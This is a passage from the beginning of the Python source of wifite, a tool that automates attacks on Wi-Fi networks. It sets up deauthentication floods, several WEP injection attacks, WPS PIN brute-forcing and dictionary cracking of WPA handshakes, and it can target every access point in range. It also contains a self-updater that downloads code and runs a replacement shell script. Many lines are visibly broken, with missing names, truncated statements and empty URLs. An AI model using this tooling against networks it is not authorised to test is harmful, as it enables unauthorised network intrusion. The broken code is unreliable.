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- #!/usr/bin/python
- # -*- coding: utf-8 -*-
- """
- wifite
- author: derv82 at gmail
- author: bwall @botnet_hunter (
- author: drone @dronesec (
- Thanks to everyone that contributed to this project.
- If you helped in the past and want your name here, shoot me an email
- Licensed under the GNU General Public License Version 2 (GNU GPL v2),
- available at:
- (C) 2011 Derv Merkler
- Ballast Security additions
- -----------------
- - No longer requires to be root to run -cracked
- - cracked.txt changed to cracked.csv and stored in csv format(easier to read, no \x00s)
- - Backwards compatibility
- - Made a run configuration class to handle globals
- - Added -recrack (shows already cracked APs in the possible targets, otherwise hides them)
- - Changed the updater to grab files from GitHub and not Google Code
- - Use argparse to parse command-line arguments
- - -wepca flag now properly initialized if passed through CLI
- - parse_csv uses python csv library
- -----------------
- Restore same command-line switch names from v1
- If device already in monitor mode, check for and, if applicable, use macchanger
- * Mention reaver automatically resumes sessions
- * Warning about length of time required for WPS attack (*hours*)
- * Show time since last successful attempt
- * Percentage of tries/attempts ?
- * Update code to work with reaver 1.4 ("x" sec/att)
- WEP:
- * ability to pause/skip/continue (done, not tested)
- * Option to capture only IVS packets (uses --output-format ivs,csv)
- - not compatible on older aircrack-ng's.
- - Just run "airodump-ng --output-format ivs,csv", "No interface specified" = works
- - would cut down on size of saved .caps
- reaver:
- - Enter ESSID when executing (?)
- - Ensure WPS key attempts have begun.
- - If no attempts can be made, stop attack
- - During attack, if no attempts are made within X minutes, stop attack & Print
- - Reaver's output when unable to associate:
- [!] WARNING: Failed to associate with AA:BB:CC:DD:EE:FF (ESSID: ABCDEF)
- - If failed to associate for x minutes, stop attack (same as no attempts?)
- * WPA - crack (pyrit/cowpatty) (not really important)
- * Test injection at startup? (skippable via command-line switch)
- """
- #############
- #############
- import csv # Exporting and importing cracked aps
- import os # File management
- import time # Measuring attack intervals
- import random # Generating a random MAC address.
- import errno # Error numbers
- from sys import argv # Command-line arguments
- from sys import stdout # Flushing
- from shutil import copy # Copying .cap files
- # Executing, communicating with, killing processes
- from subprocess import Popen, call, PIPE
- from signal import SIGINT, SIGTERM
- import re # RegEx, Converting SSID to filename
- import argparse # arg parsing
- import urllib # Check for new versions from the repo
- import abc # abstract base class libraries for attack templates
- ################################
- ################################
- # Console colors
- W = '\033[0m' # white (normal)
- R = '\033[31m' # red
- G = '\033[32m' # green
- O = '\033[33m' # orange
- B = '\033[34m' # blue
- P = '\033[35m' # purple
- C = '\033[36m' # cyan
- GR = '\033[37m' # gray
- # /dev/null, send output from programs so they don't print to screen.
- DN = open(os.devnull, 'w')
- ERRLOG = open(os.devnull, 'w')
- OUTLOG = open(os.devnull, 'w')
- ###################
- ###################
- class CapFile:
- """
- Holds data about an access point's .cap file, including AP's ESSID & BSSID.
- """
- def __init__(self, filename, ssid, bssid):
- self.filename = filename
- self.ssid = ssid
- self.bssid = bssid
- class Target:
- """
- Holds data for a Target (aka Access Point aka Router)
- """
- def __init__(self, bssid, power, data, channel, encryption, ssid):
- self.bssid = bssid
- self.power = power
- = data
- = channel
- self.encryption = encryption
- self.ssid = ssid
- self.wps = False # Default to non-WPS-enabled router.
- self.key = ''
- class Client:
- """
- Holds data for a Client (device connected to Access Point/Router)
- """
- def __init__(self, bssid, station, power):
- self.bssid = bssid
- self.station = station
- self.power = power
- class RunConfiguration:
- """
- Configuration for this rounds of attacks
- """
- def __init__(self):
- self.REVISION = 86;
- self.TX_POWER = 0 # Transmit power for wireless interface, 0 uses default power
- # WPA variables
- self.WPA_DISABLE = False # Flag to skip WPA handshake capture
- self.WPA_STRIP_HANDSHAKE = True # Use pyrit or tshark (if applicable) to strip handshake
- self.WPA_DEAUTH_COUNT = 5 # Count to send deauthentication packets
- self.WPA_DEAUTH_TIMEOUT = 10 # Time to wait between deauthentication bursts (in seconds)
- self.WPA_ATTACK_TIMEOUT = 500 # Total time to allow for a handshake attack (in seconds)
- self.WPA_HANDSHAKE_DIR = 'hs' # Directory in which handshakes .cap files are stored
- # Strip file path separator if needed
- if self.WPA_HANDSHAKE_DIR != '' and self.WPA_HANDSHAKE_DIR[-1] == os.sep:
- self.WPA_FINDINGS = [] # List of strings containing info on successful WPA attacks
- self.WPA_DONT_CRACK = False # Flag to skip cracking of handshakes
- self.WPA_DICTIONARY = '/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'
- if not os.path.exists(self.WPA_DICTIONARY): self.WPA_DICTIONARY = ''
- # Various programs to use when checking for a four-way handshake.
- # True means the program must find a valid handshake in order for wifite to recognize a handshake.
- # Not finding handshake short circuits result (ALL 'True' programs must find handshake)
- self.WPA_HANDSHAKE_TSHARK = True # Checks for sequential 1,2,3 EAPOL msg packets (ignores 4th)
- self.WPA_HANDSHAKE_PYRIT = False # Sometimes crashes on incomplete dumps, but accurate.
- self.WPA_HANDSHAKE_AIRCRACK = True # Not 100% accurate, but fast.
- self.WPA_HANDSHAKE_COWPATTY = False # Uses more lenient "nonstrict mode" (-2)
- # WEP variables
- self.WEP_DISABLE = False # Flag for ignoring WEP networks
- self.WEP_PPS = 600 # packets per second (Tx rate)
- self.WEP_TIMEOUT = 600 # Amount of time to give each attack
- self.WEP_ARP_REPLAY = True # Various WEP-based attacks via aireplay-ng
- self.WEP_CHOPCHOP = True #
- self.WEP_FRAGMENT = True #
- self.WEP_CAFFELATTE = True #
- self.WEP_P0841 = True
- self.WEP_HIRTE = True
- self.WEP_CRACK_AT_IVS = 10000 # Number of IVS at which we start cracking
- self.WEP_IGNORE_FAKEAUTH = True # When True, continues attack despite fake authentication failure
- self.WEP_FINDINGS = [] # List of strings containing info on successful WEP attacks.
- self.WEP_SAVE = False # Save packets.
- # WPS variables
- self.WPS_DISABLE = False # Flag to skip WPS scan and attacks
- self.WPS_FINDINGS = [] # List of (successful) results of WPS attacks
- self.WPS_TIMEOUT = 660 # Time to wait (in seconds) for successful PIN attempt
- self.WPS_RATIO_THRESHOLD = 0.01 # Lowest percentage of tries/attempts allowed (where tries > 0)
- self.WPS_MAX_RETRIES = 0 # Number of times to re-try the same pin before giving up completely.
- # Program variables
- self.SHOW_ALREADY_CRACKED = False # Says whether to show already cracked APs as options to crack
- self.WIRELESS_IFACE = '' # User-defined interface
- self.TARGET_CHANNEL = 0 # User-defined channel to scan on
- self.TARGET_ESSID = '' # User-defined ESSID of specific target to attack
- self.TARGET_BSSID = '' # User-defined BSSID of specific target to attack
- self.IFACE_TO_TAKE_DOWN = '' # Interface that wifite puts into monitor mode
- # It's our job to put it out of monitor mode after the attacks
- self.ORIGINAL_IFACE_MAC = ('', '') # Original interface name[0] and MAC address[1] (before spoofing)
- self.DO_NOT_CHANGE_MAC = True # Flag for disabling MAC anonymizer
- self.TARGETS_REMAINING = 0 # Number of access points remaining to attack
- self.WPA_CAPS_TO_CRACK = [] # list of .cap files to crack (full of CapFile objects)
- self.THIS_MAC = '' # The interfaces current MAC address.
- self.SHOW_MAC_IN_SCAN = False # Display MACs of the SSIDs in the list of targets
- self.CRACKED_TARGETS = [] # List of targets we have already cracked
- self.ATTACK_ALL_TARGETS = False # Flag for when we want to attack *everyone*
- self.ATTACK_MIN_POWER = 0 # Minimum power (dB) for access point to be considered a target
- self.VERBOSE_APS = True # Print access points as they appear
- self.CRACKED_TARGETS = self.load_cracked()
- old_cracked = self.load_old_cracked()
- if len(old_cracked) > 0:
- # Merge the results
- for OC in old_cracked:
- new = True
- for NC in self.CRACKED_TARGETS:
- if OC.bssid == NC.bssid:
- new = False
- break
- # If Target isn't in the other list
- # Add and save to disk
- if new:
- self.save_cracked(OC)
- def ConfirmRunningAsRoot(self):
- if os.getuid() != 0:
- print R+' [!]'+O+' ERROR:'+G+' wifite'+O+' must be run as '+R+'root'+W
- print R+' [!]'+O+' login as root ('+W+'su root'+O+') or try '+W+'sudo ./'+W
- exit(1)
- def ConfirmCorrectPlatform(self):
- if not os.uname()[0].startswith("Linux") and not 'Darwin' in os.uname()[0]: # OSX support, 'cause why not?
- print O+' [!]'+R+' WARNING:'+G+' wifite'+W+' must be run on '+O+'linux'+W
- exit(1)
- def CreateTempFolder(self):
- from tempfile import mkdtemp
- self.temp = mkdtemp(prefix='wifite')
- if not self.temp.endswith(os.sep):
- self.temp += os.sep
- def save_cracked(self, target):
- """
- Saves cracked access point key and info to a file.
- """
- self.CRACKED_TARGETS.append(target)
- with open('cracked.csv', 'wb') as csvfile:
- targetwriter = csv.writer(csvfile, delimiter=',',quotechar='"', quoting=csv.QUOTE_MINIMAL)
- for target in self.CRACKED_TARGETS:
- targetwriter.writerow([target.bssid, target.encryption, target.ssid, target.key, target.wps])
- def load_cracked(self):
- """
- Loads info about cracked access points into list, returns list.
- """
- result = []
- if not os.path.exists('cracked.csv'): return result
- with open('cracked.csv', 'rb') as csvfile:
- targetreader = csv.reader(csvfile, delimiter=',', quotechar='"')
- for row in targetreader:
- t = Target(row[0], 0, 0, 0, row[1], row[2])
- t.key = row[3]
- t.wps = row[4]
- result.append(t)
- return result
- def load_old_cracked(self):
- """
- Loads info about cracked access points into list, returns list.
- """
- result = []
- if not os.path.exists('cracked.txt'):
- return result
- fin = open('cracked.txt', 'r')
- lines ='\n')
- fin.close()
- for line in lines:
- fields = line.split(chr(0))
- if len(fields) <= 3:
- continue
- tar = Target(fields[0], '', '', '', fields[3], fields[1])
- tar.key = fields[2]
- result.append(tar)
- return result
- def exit_gracefully(self, code=0):
- """
- We may exit the program at any time.
- We want to remove the temp folder and any files contained within it.
- Removes the temp files/folder and exists with error code "code".
- """
- # Remove temp files and folder
- if os.path.exists(self.temp):
- for f in os.listdir(self.temp):
- os.remove(self.temp + f)
- os.rmdir(self.temp)
- # Disable monitor mode if enabled by us
- self.RUN_ENGINE.disable_monitor_mode()
- # Change MAC address back if spoofed
- mac_change_back()
- print GR+" [+]"+W+" quitting" # wifite will now exit"
- print ''
- # GTFO
- exit(code)
- def handle_args(self):
- """
- Handles command-line arguments, sets global variables.
- """
- set_encrypt = False
- set_hscheck = False
- set_wep = False
- capfile = '' # Filename of .cap file to analyze for handshakes
- opt_parser = self.build_opt_parser()
- options = opt_parser.parse_args()
- try:
- if not set_encrypt and (options.wpa or options.wep or options.wps):
- self.WPS_DISABLE = True
- self.WPA_DISABLE = True
- self.WEP_DISABLE = True
- set_encrypt = True
- if options.recrack:
- print GR+' [+]'+W+' including already cracked networks in targets.'
- if options.wpa:
- if options.wps:
- print GR+' [+]'+W+' targeting '+G+'WPA'+W+' encrypted networks.'
- else:
- print GR+' [+]'+W+' targeting '+G+'WPA'+W+' encrypted networks (use '+G+'-wps'+W+' for WPS scan)'
- self.WPA_DISABLE = False
- if options.wep:
- print GR+' [+]'+W+' targeting '+G+'WEP'+W+' encrypted networks'
- self.WEP_DISABLE = False
- if options.wps:
- print GR+' [+]'+W+' targeting '+G+'WPS-enabled'+W+' networks.'
- self.WPS_DISABLE = False
- if
- try: self.TARGET_CHANNEL = int(
- except ValueError: print O+' [!]'+R+' invalid channel: '
- except IndexError: print O+' [!]'+R+' no channel given!'+W
- else: print GR+' [+]'+W+' channel set to %s' % (G+str(self.TARGET_CHANNEL)+W)
- if options.mac_anon:
- print GR+' [+]'+W+' mac address anonymizing '+G+'enabled'+W
- print O+' not: only works if device is not already in monitor mode!'+W
- self.DO_NOT_CHANGE_MAC = False
- if options.interface:
- self.WIRELESS_IFACE = options.interface
- print GR+' [+]'+W+' set interface :%s' % (G+self.WIRELESS_IFACE+W)
- if options.essid:
- try: self.TARGET_ESSID = options.essid
- except ValueError: print R+' [!]'+O+' no ESSID given!'+W
- else: print GR+' [+]'+W+' targeting ESSID "%s"' % (G+self.TARGET_ESSID+W)
- if options.bssid:
- try: self.TARGET_BSSID = options.bssid
- except ValueError: print R+' [!]'+O+' no BSSID given!'+W
- else: print GR+' [+]'+W+' targeting BSSID "%s"' % (G+self.TARGET_BSSID+W)
- if options.showb:
- self.SHOW_MAC_IN_SCAN = True
- print GR+' [+]'+W+' target MAC address viewing '+G+'enabled'+W
- if options.all:
- print GR+' [+]'+W+' targeting '+G+'all access points'+W
- if options.power:
- try: self.ATTACK_MIN_POWER = int(options.power)
- except ValueError: print R+' [!]'+O+' invalid power level: %s' % (R+options.power+W)
- except IndexError: print R+' [!]'+O+' no power level given!'+W
- else: print GR+' [+]'+W+' minimum target power set to %s' % (G+str(self.ATTACK_MIN_POWER)+W)
- if options.tx:
- try: self.TX_POWER = int(options.tx)
- except ValueError: print R+' [!]'+O+' invalid TX power leve: %s' % ( R+options.tx+W)
- except IndexError: print R+' [!]'+O+' no TX power level given!'+W
- else: print GR+' [+]'+W+' TX power level set to %s' % (G+str(self.TX_POWER)+W)
- if options.quiet:
- self.VERBOSE_APS = False
- print GR+' [+]'+W+' list of APs during scan '+O+'disabled'+W
- if options.check:
- try: capfile = options.check
- except IndexError:
- print R+' [!]'+O+' unable to analyze capture file'+W
- print R+' [!]'+O+' no cap file given!\n'+W
- self.exit_gracefully(1)
- else:
- if not os.path.exists(capfile):
- print R+' [!]'+O+' unable to analyze capture file!'+W
- print R+' [!]'+O+' file not found: '+R+capfile+'\n'+W
- self.exit_gracefully(1)
- if options.update:
- self.upgrade()
- exit(0)
- if options.cracked:
- if len(self.CRACKED_TARGETS) == 0:
- print R+' [!]'+O+' There are no cracked access points saved to '+R+'cracked.db\n'+W
- self.exit_gracefully(1)
- print GR+' [+]'+W+' '+W+'previously cracked access points'+W+':'
- for victim in self.CRACKED_TARGETS:
- if victim.wps != False:
- print ' %s (%s) : "%s" - Pin: %s' % (C+victim.ssid+W, C+victim.bssid+W, G+victim.key+W, G+victim.wps+W)
- else:
- print ' %s (%s) : "%s"' % (C+victim.ssid+W, C+victim.bssid+W, G+victim.key+W)
- print ''
- self.exit_gracefully(0)
- # WPA
- if not set_hscheck and (options.tshark or options.cowpatty or options.aircrack or options.pyrit):
- set_hscheck = True
- if options.strip:
- print GR+' [+]'+W+' handshake stripping '+G+'enabled'+W
- if options.wpadt:
- try: self.WPA_DEAUTH_TIMEOUT = int(options.wpadt)
- except ValueError: print R+' [!]'+O+' invalid deauth timeout: %s' % (R+options.wpadt+W)
- except IndexError: print R+' [!]'+O+' no deauth timeout given!'+W
- else: print GR+' [+]'+W+' WPA deauth timeout set to %s' % (G+str(self.WPA_DEAUTH_TIMEOUT)+W)
- if options.wpat:
- try: self.WPA_ATTACK_TIMEOUT = int(options.wpat)
- except ValueError: print R+' [!]'+O+' invalid attack timeout: %s' % (R+options.wpat+W)
- except IndexError: print R+' [!]'+O+' no attack timeout given!'+W
- else: print GR+' [+]'+W+' WPA attack timeout set to %s' % (G+str(self.WPA_ATTACK_TIMEOUT)+W)
- if options.crack:
- self.WPA_DONT_CRACK = False
- print GR+' [+]'+W+' WPA cracking '+G+'enabled'+W
- if options.dic:
- try: self.WPA_DICTIONARY = options.dic
- except IndexError: print R+' [!]'+O+' no WPA dictionary given!'
- else:
- if os.path.exists(options.dic):
- print GR+' [+]'+W+' WPA dictionary set to %s' % (G + self.WPA_DICTIONARY + W)
- else:
- print R+' [!]'+O+' WPA dictionary file not found: %s' % (options.dic)
- else:
- print R+' [!]'+O+' WPA dictionary file not given!'
- self.exit_gracefully(1)
- if options.tshark:
- print GR+' [+]'+W+' tshark handshake verification '+G+'enabled'+W
- if options.pyrit:
- print GR+' [+]'+W+' pyrit handshake verification '+G+'enabled'+W
- if options.aircrack:
- print GR+' [+]'+W+' aircrack handshake verification '+G+'enabled'+W
- if options.cowpatty:
- print GR+' [+]'+W+' cowpatty handshake verification '+G+'enabled'+W
- # WEP
- if not set_wep and options.chopchop or options.fragment or options.caffeelatte or options.arpreplay \
- or options.p0841 or options.hirte:
- self.WEP_CHOPCHOP = False
- self.WEP_ARPREPLAY = False
- self.WEP_CAFFELATTE = False
- self.WEP_FRAGMENT = False
- self.WEP_P0841 = False
- self.WEP_HIRTE = False
- if options.chopchop:
- print GR+' [+]'+W+' WEP chop-chop attack '+G+'enabled'+W
- self.WEP_CHOPCHOP = True
- if options.fragment:
- print GR+' [+]'+W+' WEP fragmentation attack '+G+'enabled'+W
- self.WEP_FRAGMENT = True
- if options.caffeelatte:
- print GR+' [+]'+W+' WEP caffe-latte attack '+G+'enabled'+W
- self.WEP_CAFFELATTE = True
- if options.arpreplay:
- print GR+' [+]'+W+' WEP arp-replay attack '+G+'enabled'+W
- self.WEP_ARPREPLAY = True
- if options.p0841:
- print GR+' [+]'+W+' WEP p0841 attack '+G+'enabled'+W
- self.WEP_P0841 = True
- if options.hirte:
- print GR+' [+]'+W+' WEP hirte attack '+G+'enabled'+W
- self.WEP_HIRTE = True
- if options.fakeauth:
- print GR+' [+]'+W+' ignoring failed fake-authentication '+R+'disabled'+W
- if options.wepca:
- try: self.WEP_CRACK_AT_IVS = int(options.wepca)
- except ValueError: print R+' [!]'+O+' invalid number: %s' % ( R+options.wepca+W )
- except IndexError: print R+' [!]'+O+' no IV number specified!'+W
- else: print GR+' [+]'+W+' Starting WEP cracking when IV\'s surpass %s' % (G+str(self.WEP_CRACK_AT_IVS)+W)
- if options.wept:
- try: self.WEP_TIMEOUT = int(options.wept)
- except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+options.wept+W)
- except IndexError: print R+' [!]'+O+' no timeout given!'+W
- else: print GR+' [+]'+W+' WEP attack timeout set to %s' % (G+str(self.WEP_TIMEOUT) + " seconds"+W)
- if options.pps:
- try: self.WEP_PPS = int(options.pps)
- except ValueError: print R+' [!]'+O+' invalid value: %s' % (R+options.pps+W)
- except IndexError: print R+' [!]'+O+' no value given!'+W
- else: print GR+' [+]'+W+' packets-per-second rate set to %s' % (G+str(options.pps) + " packets/sec"+W)
- if options.wepsave:
- self.WEP_SAVE = True
- print GR+' [+]'+W+' WEP .cap file saving '+G+'enabled'+W
- # WPS
- if options.wpst:
- try: self.WPS_TIMEOUT = int(options.wpst)
- except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+options.wpst+W)
- except IndexError: print R+' [!]'+O+' no timeout given!'+W
- else: print GR+' [+]'+W+' WPS attack timeout set to %s' % (G+str(self.WPS_TIMEOUT)+ " seconds"+W)
- if options.wpsratio:
- try: self.WPS_RATIO_THRESHOLD = float(options.wpsratio)
- except ValueError: print R+' [!]'+O+' invalid percentage: %s' % (R+options.wpsratio+W)
- except IndexError: print R+' [!]'+O+' no ratio given!'+W
- else: print GR+' [+]'+W+' minimum WPS tries/attempts threshold set to %s' % (G+str(self.WPS_RATIO_THRESHOLD)+""+W)
- if options.wpsretry:
- try: self.WPS_MAX_RETRIES = int(options.wpsretry)
- except ValueError: print R+' [!]'+O+' invalid number: %s' % (R+options.wpsretry+W)
- except IndexError: print R+' [!]'+O+' no number given!'+W
- else: print GR+' [+]'+W+' WPS maximum retries set to %s' % (G+str(self.WPS_MAX_RETRIES) + " retries"+W)
- except IndexError:
- print '\nindexerror\n\n'
- if capfile != '':
- self.RUN_ENGINE.analyze_capfile(capfile)
- print ''
- def build_opt_parser(self):
- """ Options are doubled for backwards compatability; will be removed soon and
- fully moved to GNU-style
- """
- option_parser = argparse.ArgumentParser()
- # set commands
- command_group = option_parser.add_argument_group('COMMAND')
- command_group.add_argument('--check', help='Check capfile [file] for handshakes.', action='store', dest='check')
- command_group.add_argument('-check', action='store', dest='check', help=argparse.SUPPRESS)
- command_group.add_argument('--cracked', help='Display previously cracked access points.', action='store_true', dest='cracked')
- command_group.add_argument('-cracked', help=argparse.SUPPRESS, action='store_true', dest='cracked')
- command_group.add_argument('--recrack', help='Include already cracked networks in targets.', action='store_true', dest='recrack')
- command_group.add_argument('-recrack', help=argparse.SUPPRESS, action='store_true', dest='recrack')
- # set global
- global_group = option_parser.add_argument_group('GLOBAL')
- global_group.add_argument('--all', help='Attack all targets.', default=False, action='store_true', dest='all')
- global_group.add_argument('-all', help=argparse.SUPPRESS, default=False, action='store_true', dest='all')
- global_group.add_argument('-i', help='Wireless interface for capturing.', action='store', dest='interface')
- global_group.add_argument('--mac', help='Anonymize MAC address.', action='store_true', default=False, dest='mac_anon')
- global_group.add_argument('-mac', help=argparse.SUPPRESS, action='store_true', default=False, dest='mac_anon')
- global_group.add_argument('-c', help='Channel to scan for targets.', action='store', dest='channel')
- global_group.add_argument('-e', help='Target a specific access point by ssid (name).', action='store', dest='essid')
- global_group.add_argument('-b', help='Target a specific access point by bssid (mac).', action='store', dest='bssid')
- global_group.add_argument('--showb', help='Display target BSSIDs after scan.', action='store_true', dest='showb')
- global_group.add_argument('-showb', help=argparse.SUPPRESS, action='store_true', dest='showb')
- global_group.add_argument('--power', help='Attacks any targets with signal strength > [pow].',action='store',dest='power')
- global_group.add_argument('-power', help=argparse.SUPPRESS,action='store',dest='power')
- global_group.add_argument('--tx', help='Set adapter TX power level.', action='store', dest='tx')
- global_group.add_argument('-tx', help=argparse.SUPPRESS, action='store', dest='tx')
- global_group.add_argument('--quiet', help='Do not print list of APs during scan.', action='store_true', dest='quiet')
- global_group.add_argument('-quiet', help=argparse.SUPPRESS, action='store_true', dest='quiet')
- global_group.add_argument('--update', help='Check and update Wifite.', default=False,action='store_true', dest='update')
- global_group.add_argument('-update', help=argparse.SUPPRESS, default=False,action='store_true', dest='update')
- # set wpa commands
- wpa_group = option_parser.add_argument_group( 'WPA')
- wpa_group.add_argument('--wpa', help='Only target WPA networks (works with --wps --wep).', default=False,action='store_true', dest='wpa')
- wpa_group.add_argument('-wpa', help=argparse.SUPPRESS, default=False,action='store_true', dest='wpa')
- wpa_group.add_argument('--wpat', help='Time to wait for WPA attack to complete (seconds).', action='store', dest='wpat')
- wpa_group.add_argument('-wpat', help=argparse.SUPPRESS, action='store', dest='wpat')
- wpa_group.add_argument('--wpadt', help='Time to wait between sending deauth packets (seconds).', action='store', dest='wpadt')
- wpa_group.add_argument('-wpadt', help=argparse.SUPPRESS, action='store', dest='wpadt')
- wpa_group.add_argument('--strip', help='Strip handshake using tshark or pyrit.', default=False, action='store_true', dest='strip')
- wpa_group.add_argument('-strip', help=argparse.SUPPRESS, default=False, action='store_true', dest='strip')
- wpa_group.add_argument('--crack', help='Crack WPA handshakes using [dic] wordlist file.', action='store_true', dest='crack')
- wpa_group.add_argument('-crack', help=argparse.SUPPRESS, action='store_true', dest='crack')
- wpa_group.add_argument('--dict', help='Specificy dictionary to use when cracking WPA.', action='store', dest='dic')
- wpa_group.add_argument('-dict', help=argparse.SUPPRESS, action='store', dest='dic')
- wpa_group.add_argument('--aircrack', help='Verify handshake using aircrack.', default=False, action='store_true', dest='aircrack')
- wpa_group.add_argument('-aircrack', help=argparse.SUPPRESS, default=False, action='store_true', dest='aircrack')
- wpa_group.add_argument('--pyrit', help='Verify handshake using pyrit.', default=False, action='store_true', dest='pyrit')
- wpa_group.add_argument('-pyrit', help=argparse.SUPPRESS,default=False, action='store_true', dest='pyrit')
- wpa_group.add_argument('--tshark', help='Verify handshake using tshark.', default=False, action='store_true', dest='tshark')
- wpa_group.add_argument('-tshark', help=argparse.SUPPRESS, default=False, action='store_true', dest='tshark')
- wpa_group.add_argument('--cowpatty', help='Verify handshake using cowpatty.', default=False, action='store_true', dest='cowpatty')
- wpa_group.add_argument('-cowpatty', help=argparse.SUPPRESS, default=False, action='store_true', dest='cowpatty')
- # set WEP commands
- wep_group = option_parser.add_argument_group('WEP')
- wep_group.add_argument('--wep', help='Only target WEP networks.', default=False, action='store_true', dest='wep')
- wep_group.add_argument('-wep', help=argparse.SUPPRESS, default=False, action='store_true', dest='wep')
- wep_group.add_argument('--pps', help='Set the number of packets per second to inject.', action='store', dest='pps')
- wep_group.add_argument('-pps', help=argparse.SUPPRESS, action='store', dest='pps')
- wep_group.add_argument('--wept', help='Sec to wait for each attack, 0 implies endless.', action='store', dest='wept')
- wep_group.add_argument('-wept', help=argparse.SUPPRESS, action='store', dest='wept')
- wep_group.add_argument('--chopchop', help='Use chopchop attack.', default=False, action='store_true', dest='chopchop')
- wep_group.add_argument('-chopchop', help=argparse.SUPPRESS, default=False, action='store_true', dest='chopchop')
- wep_group.add_argument('--arpreplay', help='Use arpreplay attack.', default=False, action='store_true', dest='arpreplay')
- wep_group.add_argument('-arpreplay', help=argparse.SUPPRESS, default=False, action='store_true', dest='arpreplay')
- wep_group.add_argument('--fragment', help='Use fragmentation attack.', default=False, action='store_true', dest='fragment')
- wep_group.add_argument('-fragment', help=argparse.SUPPRESS, default=False, action='store_true', dest='fragment')
- wep_group.add_argument('--caffelatte', help='Use caffe-latte attack.', default=False, action='store_true', dest='caffeelatte')
- wep_group.add_argument('-caffelatte', help=argparse.SUPPRESS, default=False, action='store_true', dest='caffeelatte')
- wep_group.add_argument('--p0841', help='Use P0842 attack.', default=False, action='store_true', dest='p0841')
- wep_group.add_argument('-p0841', help=argparse.SUPPRESS, default=False, action='store_true', dest='p0841')
- wep_group.add_argument('--hirte', help='Use hirte attack.', default=False, action='store_true', dest='hirte')
- wep_group.add_argument('-hirte', help=argparse.SUPPRESS, default=False, action='store_true', dest='hirte')
- wep_group.add_argument('--nofakeauth', help='Stop attack if fake authentication fails.', default=False, action='store_true', dest='fakeauth')
- wep_group.add_argument('-nofakeauth', help=argparse.SUPPRESS, default=False, action='store_true', dest='fakeauth')
- wep_group.add_argument('--wepca', help='Start cracking when number of IVs surpass [n].', action='store', dest='wepca')
- wep_group.add_argument('-wepca', help=argparse.SUPPRESS, action='store', dest='wepca')
- wep_group.add_argument('--wepsave', help='Save a copy of .cap files to this directory.', default=None,action='store', dest='wepsave')
- wep_group.add_argument('-wepsave', help=argparse.SUPPRESS, default=None,action='store', dest='wepsave')
- # set WPS commands
- wps_group = option_parser.add_argument_group('WPS')
- wps_group.add_argument('--wps', help='Only target WPS networks.', default=False, action='store_true', dest='wps')
- wps_group.add_argument('-wps', help=argparse.SUPPRESS, default=False, action='store_true', dest='wps')
- wps_group.add_argument('--wpst', help='Max wait for new retry before giving up (0: never).', action='store', dest='wpst')
- wps_group.add_argument('-wpst', help=argparse.SUPPRESS, action='store', dest='wpst')
- wps_group.add_argument('--wpsratio', help='Min ratio of successful PIN attempts/total retries.', action='store', dest='wpsratio')
- wps_group.add_argument('-wpsratio', help=argparse.SUPPRESS, action='store', dest='wpsratio')
- wps_group.add_argument('--wpsretry', help='Max number of retries for same PIN before giving up.', action='store', dest='wpsretry')
- wps_group.add_argument('-wpsretry', help=argparse.SUPPRESS, action='store', dest='wpsretry')
- return option_parser
- def upgrade(self):
- """
- Checks for new version, prompts to upgrade, then
- replaces this script with the latest from the repo
- """
- try:
- print GR+' [!]'+W+' upgrading requires an '+G+'internet connection'+W
- print GR+' [+]'+W+' checking for latest version...'
- revision = get_revision()
- if revision == -1:
- print R+' [!]'+O+' unable to access GitHub'+W
- elif revision > self.REVISION:
- print GR+' [!]'+W+' a new version is '+G+'available!'+W
- print GR+' [-]'+W+' revision: '+G+str(revision)+W
- response = raw_input(GR+' [+]'+W+' do you want to upgrade to the latest version? (y/n): ')
- if not response.lower().startswith('y'):
- print GR+' [-]'+W+' upgrading '+O+'aborted'+W
- self.exit_gracefully(0)
- return
- # Download script, replace with this one
- print GR+' [+] '+G+'downloading'+W+' update...'
- try:
- sock = urllib.urlopen('')
- page =
- except IOError:
- page = ''
- if page == '':
- print R+' [+] '+O+'unable to download latest version'+W
- self.exit_gracefully(1)
- # Create/save the new script
- f=open('','w')
- f.write(page)
- f.close()
- # The filename of the running script
- this_file = __file__
- if this_file.startswith('./'):
- this_file = this_file[2:]
- # create/save a shell script that replaces this script with the new one
- f = open('','w')
- f.write('''#!/bin/sh\n
- rm -rf ''' + this_file + '''\n
- mv ''' + this_file + '''\n
- rm -rf\n
- chmod +x ''' + this_file + '''\n
- ''')
- f.close()
- # Change permissions on the script
- returncode = call(['chmod','+x',''])
- if returncode != 0:
- print R+' [!]'+O+' permission change returned unexpected code: '+str(returncode)+W
- self.exit_gracefully(1)
- # Run the script
- returncode = call(['sh',''])
- if returncode != 0:
- print R+' [!]'+O+' upgrade script returned unexpected code: '+str(returncode)+W
- self.exit_gracefully(1)
- print GR+' [+] '+G+'updated!'+W+' type "./' + this_file + '" to run again'
- else:
- print GR+' [-]'+W+' your copy of wifite is '+G+'up to date'+W
- except KeyboardInterrupt:
- print R+'\n (^C)'+O+' wifite upgrade interrupted'+W
- self.exit_gracefully(0)
- class RunEngine:
- def __init__(self, run_config):
- self.RUN_CONFIG = run_config
- def initial_check(self):
- """
- Ensures required programs are installed.
- """
- airs = ['aircrack-ng', 'airodump-ng', 'aireplay-ng', 'airmon-ng', 'packetforge-ng']
- for air in airs:
- if program_exists(air): continue
- print R+' [!]'+O+' required program not found: %s' % (R+air+W)
- print R+' [!]'+O+' this program is bundled with the aircrack-ng suite:'+W
- print R+' [!]'+O+' '+C+''+W
- print R+' [!]'+O+' or: '+W+'sudo apt-get install aircrack-ng\n'+W
- self.RUN_CONFIG.exit_gracefully(1)
- if not program_exists('iw'):
- print R+' [!]'+O+' airmon-ng requires the program %s\n' % (R+'iw'+W)
- self.RUN_CONFIG.exit_gracefully(1)
- printed = False
- # Check reaver
- if not program_exists('reaver'):
- printed = True
- print R+' [!]'+O+' the program '+R+'reaver'+O+' is required for WPS attacks'+W
- print R+' '+O+' available at '+C+''+W
- elif not program_exists('walsh') and not program_exists('wash'):
- printed = True
- print R+' [!]'+O+' reaver\'s scanning tool '+R+'walsh'+O+' (or '+R+'wash'+O+') was not found'+W
- print R+' [!]'+O+' please re-install reaver or install walsh/wash separately'+W
- # Check handshake-checking apps
- recs = ['tshark', 'pyrit', 'cowpatty']
- for rec in recs:
- if program_exists(rec): continue
- printed = True
- print R+' [!]'+O+' the program %s is not required, but is recommended%s' % (R+rec+O, W)
- if printed: print ''
- def enable_monitor_mode(self, iface):
- """
- First attempts to anonymize the MAC if requested; MACs cannot
